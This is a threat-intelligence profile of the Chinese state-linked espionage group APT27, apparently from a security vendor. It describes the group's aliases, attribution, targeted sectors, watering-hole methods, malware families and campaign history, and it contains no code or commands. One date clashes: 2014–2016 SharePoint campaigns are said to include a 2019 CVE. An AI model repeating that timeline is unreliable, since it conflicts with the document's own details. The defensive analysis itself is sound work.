> threat_actor APT27 —— origin: China (PRC / MSS-assessed) —— alias: Emissary Panda / LuckyMouse —— signature: strategic web compromise + enterprise intrusion<span class="cursor-blink">_</span>_
APT27 — also tracked as Emissary Panda, LuckyMouse, Iron Tiger, Bronze Union, Group 35, ZipToken, TG-3390, Earth Smilodon, and Budworm — is a Chinese state-sponsored threat group that has been conducting cyber espionage operations since at least 2010. APT27 is distinguished by its persistent targeting of defence, aerospace, energy, government, and technology sectors, with a particular emphasis on strategic web compromises (watering hole attacks) as a primary method of initial access. Their campaigns are characterised by methodical, long-duration intrusions designed to harvest sensitive data — intellectual property, government policy documents, military technology, and energy sector intelligence — that directly serves the People's Republic of China's geopolitical and economic interests.
The group's operational tradecraft has evolved significantly over its fifteen-year history. Early campaigns relied heavily on spear-phishing and exploitation of Microsoft SharePoint vulnerabilities to gain footholds in target networks. From approximately 2017 onward, APT27 shifted toward strategic web compromises at scale — identifying and compromising websites frequented by personnel in targeted industries and injecting exploit code that silently delivers malware to visitors matching specific targeting criteria. This evolution reflects a broader trend in Chinese cyber operations: moving away from high-volume, easily attributable phishing campaigns toward more surgical initial access methods that are harder to detect and attribute.
APT27's technical arsenal centres on a suite of custom malware — most notably the HyperBro RAT and the SysUpdate backdoor — supplemented by shared Chinese tooling such as PlugX and the China Chopper web shell. In recent years, the group has demonstrated a significant expansion of capabilities: developing cross-platform Linux variants of their implants, leveraging legitimate cloud services (including Google Drive and Pastebin) for command and control communications, and exploiting high-profile vulnerabilities like ProxyLogon (CVE-2021-26855) to compromise Microsoft Exchange servers at scale. The German Federal Office for the Protection of the Constitution (BfV) publicly attributed APT27 campaigns to the PRC in January 2022, issuing a formal advisory warning German organisations — particularly those in the defence and technology sectors — of the group's active targeting.
| Attribute | Detail |
|---|---|
| Tracked Names | APT27 (Mandiant/Google), Emissary Panda (CrowdStrike), LuckyMouse (Kaspersky), Iron Tiger (Trend Micro), Bronze Union (Secureworks), Group 35 (Talos), ZipToken (various), TG-3390 (Dell SecureWorks), Earth Smilodon (Trend Micro), Budworm (Symantec) |
| Country of Origin | People's Republic of China — APT27's operations are assessed with high confidence to be state-sponsored, likely operating under the direction of Chinese intelligence services. The German Federal Office for the Protection of the Constitution (Bundesamt für Verfassungsschutz, BfV) formally attributed APT27 campaigns to the PRC in a January 2022 advisory, marking one of the most explicit European governmental attributions of a Chinese APT group. The group's targeting priorities — defence, aerospace, energy, and government — align consistently with China's strategic intelligence requirements and economic development objectives. |
| Suspected Affiliation | Assessed to operate under the direction of the Chinese Ministry of State Security (MSS) or an affiliated provincial bureau, though the precise organisational relationship has not been publicly confirmed with the same specificity as groups like APT41 (Chengdu 404) or APT10 (Tianjin Bureau). APT27's operational patterns — working hours aligned to China Standard Time, targeting aligned with PRC strategic priorities, and use of infrastructure and tooling shared with other known MSS-affiliated groups — support a state-sponsored attribution. The group's long operational history and sustained access to zero-day capabilities suggest institutional backing rather than freelance activity. |
| First Observed | At least 2010, making APT27 one of the longer-running Chinese APT groups. Early operations focused on defence contractors, government agencies, and technology companies in the United States and Europe. The group's tradecraft has evolved substantially since its earliest campaigns, transitioning from broad spear-phishing operations to highly targeted strategic web compromises and vulnerability exploitation, reflecting both operational maturation and adaptations to improved Western defensive capabilities. |
| Primary Motivation | State-directed cyber espionage for strategic intelligence collection. APT27's campaigns consistently target data that serves the PRC's geopolitical, military, and economic interests: defence and aerospace technology, energy sector intelligence, government policy documents, diplomatic communications, and telecommunications infrastructure data. Unlike APT41, there is no credible evidence of financially motivated operations — APT27 appears to operate exclusively in service of state intelligence requirements. |
APT27's targeting is tightly aligned with China's strategic intelligence priorities — particularly in defence, aerospace, energy, and government sectors. Unlike more broadly targeted groups, APT27 demonstrates a focused operational mandate, concentrating on industries where stolen data provides direct strategic advantage to the PRC. Geographically, early campaigns concentrated on North America and Western Europe, but from approximately 2015 onward the group expanded significantly into the Middle East, Central Asia, and Southeast Asia — regions where China's Belt and Road Initiative and energy security interests create intelligence requirements. Targeted countries include the United States, United Kingdom, Germany, France, India, Turkey, Israel, Mongolia, and multiple Central Asian republics.
| Sector | Strategic Value | Observed Targeting |
|---|---|---|
| Defence & Aerospace | Military technology, weapons systems specifications, defence procurement data, and strategic communications intelligence — directly supporting PLA modernisation and China's defence industrial base | Sustained campaigns against defence contractors, military research institutions, and aerospace manufacturers in the US, Europe, and Asia. Targeted data includes weapons platform designs, satellite systems, radar technology, and military logistics information. APT27 has maintained persistent access to some defence targets for years. |
| Energy | Oil and gas exploration data, power grid architecture, nuclear technology, and renewable energy intellectual property — supporting China's energy security strategy and industrial competitiveness | Targeted energy companies across the oil, gas, nuclear, and renewable sectors in the US, Middle East, and Central Asia. Campaigns have focused on extracting exploration data, operational technology documentation, and strategic energy policy information. Targeting intensified alongside China's Belt and Road energy infrastructure investments. |
| Government | Diplomatic intelligence, foreign policy positions, trade negotiation strategies, and surveillance of individuals of interest to Chinese intelligence services | Compromised government agencies and foreign ministries in the US, Europe, Middle East, and Southeast Asia. Targeted data includes diplomatic cables, policy analysis documents, and intelligence related to bilateral relationships and multilateral negotiations involving China. |
| Telecommunications | Network architecture data, call detail records, and infrastructure access enabling surveillance of targeted individuals without direct device compromise | Targeted telecoms operators in Central Asia, the Middle East, and Southeast Asia. Access to telecommunications infrastructure provides persistent surveillance capabilities against individuals of intelligence interest, including government officials, dissidents, and journalists. |
| Technology | Source code, intellectual property, product roadmaps, and supply chain intelligence supporting China's technological self-sufficiency goals | Compromised technology companies in the US, Europe, and Asia-Pacific. Targeted data includes proprietary source code, trade secrets, product development plans, and data that could provide competitive advantage to Chinese technology firms. |
| Education & Research | Access to cutting-edge research in defence-relevant fields, advanced materials science, and technology areas aligned with PRC strategic priorities | Targeted universities and research institutions conducting work in areas of interest to the PRC — particularly those with defence research contracts or partnerships with targeted defence and technology organisations. |
APT27's defining operational characteristic is its mastery of strategic web compromises — commonly known as watering hole attacks. Rather than sending phishing emails directly to targets (an approach that is increasingly detected and blocked), APT27 identifies websites that are frequently visited by personnel in their target industries and compromises those sites to serve as malware delivery platforms. This technique inverts the attacker-defender dynamic: instead of the threat actor reaching out to the victim, the victim comes to the threat actor. The compromise of a single industry-specific website can provide access to dozens or hundreds of organisations in the target sector, all without sending a single email.
APT27's watering hole operations are characterised by careful reconnaissance and precise targeting. The group typically profiles website visitors using JavaScript code that collects information about the visitor's browser, operating system, IP address, and installed plugins. Only visitors matching specific criteria — such as IP ranges belonging to targeted organisations or browser configurations indicating a corporate environment — are served exploits. This selectivity serves a dual purpose: it maximises the value of the operation by focusing on high-priority targets, and it minimises the risk of detection by ensuring that security researchers and automated scanning tools are less likely to trigger the exploit chain.
The exploit chains deployed through these watering holes have evolved over time. Earlier campaigns exploited Internet Explorer and Java vulnerabilities, while more recent operations have leveraged browser-based exploits targeting Chrome and Firefox, as well as vulnerabilities in commonly deployed enterprise software. Once a visitor is compromised, APT27 typically deploys an initial-stage loader that retrieves the group's primary implant — HyperBro or SysUpdate — from a separate staging server, minimising the amount of malicious code hosted on the compromised website and complicating forensic analysis for incident responders.
| Tool | Type | Capabilities |
|---|---|---|
| HyperBro | RAT (Custom) | APT27's flagship remote access trojan and the group's most distinctive tool. HyperBro is a fully featured backdoor that provides file management, command shell access, screen capture, keylogging, and proxy capabilities. It is typically deployed via DLL side-loading — using a legitimate signed executable to load a malicious DLL that decrypts and executes the HyperBro payload from an encrypted data file. This three-component deployment model (legitimate EXE + malicious DLL + encrypted payload) is a hallmark of APT27 operations. HyperBro communicates with C2 servers over HTTPS and supports configurable communication intervals. Recent variants have incorporated anti-analysis features including virtual machine detection and sandbox evasion. |
| SysUpdate | Backdoor (Custom, Cross-Platform) | A sophisticated backdoor that represents APT27's evolution toward cross-platform capabilities. SysUpdate was initially Windows-only but Trend Micro documented a Linux variant in 2023 — a significant development indicating that APT27 is adapting its tooling to target Linux-based infrastructure, including cloud environments and servers. SysUpdate supports file operations, command execution, process management, service manipulation, screenshot capture, and network tunnelling. It communicates via HTTPS and can leverage legitimate cloud services for C2 — including Google Drive APIs — to blend with normal enterprise traffic. |
| PlugX (Korplug) | RAT (Shared Chinese Tooling) | A modular remote access trojan shared across numerous Chinese APT groups. APT27 has been a prolific user of PlugX throughout its operational history, deploying it as both a primary implant and as a complement to HyperBro and SysUpdate. APT27's PlugX deployments typically use DLL side-loading via legitimate signed executables — the same three-component deployment model used for HyperBro. The group's PlugX configurations have been used for clustering and attribution, as APT27 tends to use distinctive mutex names, C2 communication patterns, and encryption keys. |
| ZXShell | Backdoor (Custom / Shared) | A backdoor rootkit that has been associated with APT27 since the group's earlier campaigns. ZXShell provides command execution, file management, and network proxy capabilities, with rootkit functionality to hide its presence on compromised systems. It includes features for port forwarding and reverse connections, enabling operators to pivot through compromised hosts. ZXShell's source code has been partially shared or leaked, leading to its adoption by other Chinese threat groups, but APT27 is assessed to be among its original developers or earliest adopters. |
| China Chopper | Web Shell | A compact (~4KB) web shell widely used across Chinese APT groups for maintaining access to compromised web servers. APT27 deploys China Chopper as an initial foothold on internet-facing servers — particularly following exploitation of SharePoint, Exchange, and other web application vulnerabilities. Despite its small size, China Chopper provides command execution, file management, database access, and virtual terminal capabilities. Its minimal footprint and encrypted communications make it difficult to detect through network traffic analysis alone. |
| ShadowPad | Modular Backdoor (Shared Chinese Tooling) | A highly modular backdoor platform that has proliferated across the Chinese threat landscape. APT27 adopted ShadowPad in later operations (approximately 2019 onward), likely through tooling sharing arrangements within the Chinese intelligence ecosystem. ShadowPad's plugin architecture supports a wide range of capabilities — keylogging, credential harvesting, file management, and network discovery — loaded on demand to minimise forensic footprint. Its use by APT27 alongside their custom tools reflects the group's pragmatic approach to tooling. |
| Cobalt Strike BEACON | Commercial C2 Framework | The commercially available post-exploitation framework widely adopted by both state-sponsored and criminal threat actors. APT27 uses Cobalt Strike as a flexible command and control platform, particularly during the lateral movement phase of operations. BEACON provides robust post-exploitation capabilities including credential theft, network enumeration, and file transfer. APT27 typically configures BEACON with HTTPS C2 channels and malleable communication profiles designed to mimic legitimate web traffic. |
| Mimikatz | Credential Harvesting (Open Source) | The widely used credential extraction tool employed by APT27 for harvesting Windows credentials from memory, including plaintext passwords, NTLM hashes, and Kerberos tickets. APT27 uses Mimikatz extensively during post-compromise operations to enable lateral movement across enterprise networks. The group has been observed using both standard Mimikatz binaries and customised variants designed to evade endpoint detection. |
APT27's campaign history reveals a group that has steadily expanded its targeting scope and technical sophistication over more than a decade of operations. Early campaigns (2010–2014) were characterised by spear-phishing operations and exploitation of document rendering vulnerabilities, primarily targeting defence contractors and government agencies in the United States and Western Europe. These initial operations, documented by Dell SecureWorks under the designation TG-3390, established the group's core focus areas and demonstrated their ability to maintain persistent access to high-value targets for extended periods — in some cases, years of undetected presence within compromised networks.
The SharePoint exploitation campaigns (2014–2016) marked APT27's emergence as a particularly dangerous threat to enterprise environments. The group identified that many government and defence organisations relied on internet-facing Microsoft SharePoint servers for collaboration and document management, and systematically targeted vulnerabilities in these platforms — including CVE-2019-0604 and earlier SharePoint flaws — to gain initial access. Once inside, APT27 deployed PlugX and HyperBro implants, established persistence through DLL side-loading, and conducted methodical lateral movement to reach high-value data repositories. These campaigns demonstrated APT27's understanding of enterprise IT architecture and their ability to navigate complex corporate networks to reach their intelligence objectives.
From 2017 onward, APT27's strategic web compromise campaigns became the group's defining operational characteristic. Kaspersky documented a series of campaigns under the LuckyMouse designation in which APT27 compromised websites belonging to government agencies and industry organisations in Central Asia and the Middle East, using them as watering holes to deliver HyperBro and PlugX to visitors from targeted organisations. In one notable campaign, the group compromised the website of a national data centre in a Central Asian country, gaining access to a wide range of government systems through a single compromise point. These operations demonstrated APT27's strategic thinking — rather than targeting individual organisations, they targeted shared infrastructure and common resources to achieve broad access efficiently.
The ProxyLogon exploitation campaign (March 2021 onward) represented APT27's most aggressive and wide-ranging operation. Following the disclosure of critical vulnerabilities in Microsoft Exchange Server — collectively known as ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) — APT27 was among the threat groups that rapidly weaponised these flaws. The German BfV specifically attributed exploitation of ProxyLogon to APT27 in their January 2022 advisory, noting that the group targeted German organisations in the defence and technology sectors. APT27 used the Exchange vulnerabilities to deploy China Chopper web shells, which served as initial footholds for loading HyperBro RAT payloads. The scale of Exchange exploitation was unprecedented — thousands of Exchange servers worldwide were compromised by multiple Chinese threat groups in a matter of days, with APT27 focusing on targets aligned with their established intelligence priorities.
The German BfV advisory and attribution (January 2022) was a landmark moment for APT27. The BfV — Germany's domestic intelligence agency — issued a formal cyber threat advisory specifically identifying APT27 as a PRC-sponsored threat group actively targeting German organisations. The advisory detailed APT27's use of HyperBro RAT, described the group's DLL side-loading deployment methodology, and provided specific indicators of compromise to assist German defenders. This represented one of the most explicit European governmental attributions of a Chinese APT group and signalled a shift in how European nations publicly address Chinese cyber espionage — moving from diplomatic discretion to direct, named attribution.
In 2023 and 2024, APT27 continued to evolve with campaigns deploying cross-platform Linux variants of SysUpdate and targeting cloud infrastructure. Trend Micro documented the Earth Smilodon campaigns in which APT27 deployed Linux-compatible backdoors against servers and containerised environments, reflecting the group's adaptation to modern enterprise architectures where critical workloads increasingly run on Linux-based systems. Simultaneously, the group expanded its use of legitimate cloud services — including Google Drive and Dropbox APIs — for command and control communications, making network-level detection significantly more challenging for defenders who cannot easily block traffic to major cloud platforms.
Defending against APT27 requires a layered security approach that accounts for the group's diverse initial access methods, patient post-compromise tradecraft, and increasingly sophisticated evasion techniques. APT27 is a persistent threat — once inside a network, they establish multiple persistence mechanisms and can maintain access for months or years. Their use of legitimate cloud services for C2, DLL side-loading via trusted executables, and cross-platform malware means that no single defensive control is sufficient. Effective defence requires combining proactive vulnerability management, robust endpoint detection, network monitoring, and active threat hunting.
APT27 operates within China's extensive state-sponsored cyber ecosystem — a network of threat groups affiliated with the People's Liberation Army (PLA), the Ministry of State Security (MSS), and the Ministry of Public Security (MPS). APT27 is assessed to operate under MSS direction, though its precise organisational placement has not been publicly established with the same certainty as groups like APT10 (MSS Tianjin Bureau) or APT41 (Chengdu 404). The group shares tooling — particularly PlugX and, more recently, ShadowPad — with other Chinese APT groups, reflecting the collaborative (or at least shared-resource) nature of the Chinese cyber intelligence apparatus. APT27's focused mandate on defence, energy, and government intelligence collection positions it as a strategic intelligence collection group, distinct from the broader intellectual property theft operations of groups like APT1 or the dual-mandate operations of APT41.
| Group | Affiliation | Primary Focus | Relationship to APT27 |
|---|---|---|---|
| APT1 (Comment Crew) | PLA Unit 61398 | Broad industrial espionage across 20+ industries for economic and military advantage | Different organisational lineage (PLA vs assessed MSS). APT1 represented the earlier, military-driven model of Chinese cyber espionage. Both target defence and technology sectors, but APT1's operations were characterised by higher volume and less operational sophistication. No significant tooling overlap. |
| APT10 (Stone Panda) | MSS (Tianjin Bureau) | Managed service provider (MSP) targeting for downstream access; intellectual property theft across multiple industries | Both assessed to operate under MSS direction. APT10 focuses on supply chain access through MSPs, while APT27 favours direct compromise via watering holes and vulnerability exploitation. Both use PlugX extensively, but their operational patterns and primary tooling differ significantly. |
| APT41 (Double Dragon) | MSS (Chengdu 404) | Dual-mandate: state espionage across multiple sectors and financially motivated cybercrime | Both are MSS-affiliated and share some tooling (PlugX, ShadowPad, China Chopper). APT41's scope is broader and includes financial crime, which APT27 does not pursue. ShadowPad adoption by APT27 in recent campaigns suggests tooling proliferation from APT41 or the broader Winnti ecosystem. Both have targeted defence and technology sectors. |
| APT40 (Leviathan) | MSS (Hainan Bureau) | Maritime, defence, and engineering intelligence aligned with South China Sea interests | Both are MSS-affiliated and target defence sectors, but with different geographic and thematic focus areas. APT40 concentrates on maritime and naval technology, while APT27 has broader defence and energy targeting. Both use PlugX and share operational patterns characteristic of MSS contractors. |
| Volt Typhoon | PLA (assessed) | Pre-positioning in US critical infrastructure for potential disruption during geopolitical conflict | Fundamentally different mission. Volt Typhoon focuses on infrastructure pre-positioning using living-off-the-land techniques, while APT27 conducts traditional intelligence collection using custom malware. Both target energy and government sectors but for entirely different purposes — intelligence collection versus operational preparation. |
| APT31 (Zirconium) | MSS (assessed) | Political espionage targeting government officials, policy advisors, and political organisations | Both are MSS-assessed groups with overlapping government targeting. APT31 focuses more narrowly on political intelligence and democratic institutions, while APT27 has a broader mandate including defence and energy. Both have been observed using shared Chinese tooling and infrastructure patterns. |
APT27's sustained focus on defence and energy intelligence positions the group as a strategic asset within China's intelligence apparatus. While groups like APT41 attract attention for their dual-mandate operations and supply chain attacks, and Volt Typhoon raises alarm for its infrastructure pre-positioning, APT27 quietly and persistently collects the intelligence that informs Chinese military modernisation, energy security strategy, and foreign policy decisions. The group's shift toward targeting the Middle East and Central Asia — regions critical to China's Belt and Road Initiative — further underscores the alignment between APT27's operations and the PRC's strategic priorities. The German BfV attribution in 2022 marked an important milestone in the public understanding of APT27, but the group's activities span well beyond Germany — they remain an active and significant threat to defence, energy, and government organisations worldwide.
APT27 is a patient, methodical, and technically capable Chinese state-sponsored threat group that has been conducting cyber espionage operations for over fifteen years. Their signature use of strategic web compromises — watering hole attacks targeting websites frequented by defence, energy, and government personnel — sets them apart from Chinese APT groups that rely primarily on spear-phishing or supply chain attacks. This approach allows APT27 to compromise multiple organisations through a single operation while minimising the detection risks associated with direct targeting. Combined with a capable custom malware arsenal centred on HyperBro RAT and SysUpdate, and supplemented by shared Chinese tooling including PlugX and ShadowPad, APT27 maintains the ability to penetrate and persistently operate within some of the most security-conscious enterprise environments.
The group's evolution over the past decade reflects broader trends in Chinese cyber operations: a shift from volume-based operations to more surgical targeting, the development of cross-platform capabilities to address modern cloud and Linux-based infrastructure, the adoption of legitimate cloud services for command and control to evade network-based detection, and a geographic expansion that now encompasses the Middle East and Central Asia alongside traditional Western targets. The German BfV's formal attribution in 2022 — publicly naming APT27 and linking it to the PRC — demonstrates the increasing willingness of European governments to call out Chinese cyber espionage, but has not visibly deterred the group's operations.
For organisations in APT27's target sectors — defence, aerospace, energy, government, telecommunications, and technology — the group represents a persistent and sophisticated threat that demands sustained defensive investment. APT27 does not conduct smash-and-grab operations; they establish deep, long-term access to compromised networks, patiently collecting intelligence over months or years. Defending against this operational model requires layered security that combines aggressive vulnerability management for internet-facing systems, robust endpoint detection capable of identifying DLL side-loading and in-memory payloads, network monitoring that accounts for cloud-based C2 channels, and proactive threat hunting informed by up-to-date intelligence on APT27's evolving tradecraft. The group's fifteen-year operational history makes clear that they are not going away — and their continued adaptation ensures they will remain a significant threat for years to come.
Our penetration testing and threat intelligence services can evaluate your defences against APT27's specific tactics — watering hole attacks, SharePoint and Exchange exploitation, DLL side-loading, cloud-based command and control, and long-duration network persistence — to identify gaps before a state-sponsored adversary exploits them.